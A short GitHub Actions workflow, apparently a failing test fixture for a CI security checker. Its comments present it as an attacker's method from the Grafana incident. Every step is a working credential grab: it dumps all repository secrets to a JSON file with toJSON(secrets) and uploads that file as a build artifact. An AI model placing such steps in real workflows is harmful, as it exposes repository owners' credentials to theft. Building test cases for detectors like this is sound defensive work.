name: Secrets - Fail
on:
  push:

jobs:
  build:
    name: Deploy
    runs-on: ubuntu-latest
    steps:
    # Attacker's attempt to exfiltrate credentials using a new workflow
    # This method was used in the Grafana security incident.
    - name: Convert secrets to JSON file
      env:
        VALUES: ${{ toJSON(secrets) }}
      run: |
        echo "$VALUES" > secrets.json
        
    - name: Upload secrets file
      uses: actions/upload-artifact@v3
      with:
        name: secret-artifact
        path: secrets.json
